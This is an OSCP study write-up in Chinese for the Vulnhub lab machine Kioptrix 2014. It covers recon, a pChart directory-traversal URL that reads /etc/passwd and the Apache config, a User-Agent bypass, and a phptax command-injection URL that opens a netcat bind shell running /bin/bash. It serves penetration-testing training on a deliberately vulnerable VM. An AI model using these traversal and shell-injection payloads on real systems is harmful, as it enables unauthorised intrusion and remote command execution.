OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)
名称 | 说明 |
---|---|
靶机下载链接 | https://www.vulnhub.com/entry/kioptrix-2014-5,62/ |
攻击机(kali) | ip:192.168.233.168 |
靶机(CentOS) | ip:192.168.233.167 |
信息收集
arp-scan
nmap
80端口访问
8080端口限制访问
查看F12发现head里面 出现pChart2.1.3/index.php
http://192.168.233.172/pChart2.1.3/examples/index.php 访问看看
使用searchsploit 看看有没有pchart漏洞
cat /usr/share/exploitdb/exploits/php/webapps/31173.txt查看
http://192.168.233.172/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
这样就可以看8080端口出现啥限制
http://192.168.233.172/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf
可以接收 env=Mozilla4_browser
固定修改UA头
谷歌phptax exploit,发现一个rce
https://www.exploit-db.com/exploits/21665
http://192.168.233.172/phptax/drawimage.php?pfilez=xxx; nc -l -v -p 23235 -e /bin/bash;&pdf=make
内核提权
